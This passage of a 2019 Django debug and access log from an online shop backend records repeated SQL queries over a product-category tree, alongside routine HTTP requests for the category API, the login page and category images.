2019-12-20 08:03:58,261 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 08:03:58,263 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 08:03:58,266 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 08:03:58,269 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 08:03:58,272 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 08:03:58,275 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 08:03:58,278 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 08:03:58,281 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 08:03:58,285 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 08:03:58,287 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 08:03:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:13:47] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:19:06] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:24:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:29:12] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:34:15] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:43:13] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:48:16] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:53:19] "GET / HTTP/1.0" 302 0 [20/Dec/2019 08:58:22] "GET / HTTP/1.0" 302 0 [20/Dec/2019 09:00:20] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 09:00:28,692 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'e9o0w8pvp0vtmn3c9q32cop2cbf8dvrj' LIMIT 1; args=('e9o0w8pvp0vtmn3c9q32cop2cbf8dvrj',) DEBUG 2019-12-20 09:00:28,694 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('e9o0w8pvp0vtmn3c9q32cop2cbf8dvrj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T09:00:28.693017+00:00'::timestamptz); args=('e9o0w8pvp0vtmn3c9q32cop2cbf8dvrj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 9, 0, 28, 693017, tzinfo=)) [20/Dec/2019 09:00:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [20/Dec/2019 09:15:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 09:20:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 09:25:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 09:27:10,190 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 09:27:10,196 utils 4252 140031503103744 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:27:10,203 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:27:10,209 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:27:10,216 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) [20/Dec/2019 09:27:10] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 09:27:10,221 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:27:10,228 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:27:10,232 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:27:10,236 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:27:10,241 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:27:10,245 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:27:10,251 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:27:10,255 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:27:10,259 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:27:10,263 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:27:10,267 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:27:10,273 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:27:10,277 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:27:10,282 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:27:10,286 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:27:10,290 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 09:27:10,296 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:27:10,300 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:27:10,304 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:27:10,309 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:27:10,313 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:27:10,317 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:27:10,323 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:27:10,327 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:27:10,331 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:27:10,335 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:27:10,339 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:27:10,345 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:27:10,349 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:27:10,354 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:27:10,358 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:27:10,362 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:27:10,368 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:27:10,372 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:27:10,376 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:27:10,380 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:27:10,384 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:27:10,388 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:27:10,393 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:27:10,397 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:27:10,401 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:27:10,406 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:27:10,411 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:27:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 09:27:10] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 09:27:11] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 09:27:11] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [20/Dec/2019 09:27:11] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [20/Dec/2019 09:27:11] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [20/Dec/2019 09:27:11] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [20/Dec/2019 09:27:14] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [20/Dec/2019 09:27:18] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [20/Dec/2019 09:27:18] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [20/Dec/2019 09:27:19] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [20/Dec/2019 09:27:19] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [20/Dec/2019 09:30:44] "GET / HTTP/1.0" 302 0 [20/Dec/2019 09:35:46] "GET / HTTP/1.0" 302 0 [20/Dec/2019 09:45:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 09:46:42,892 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:46:42,900 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 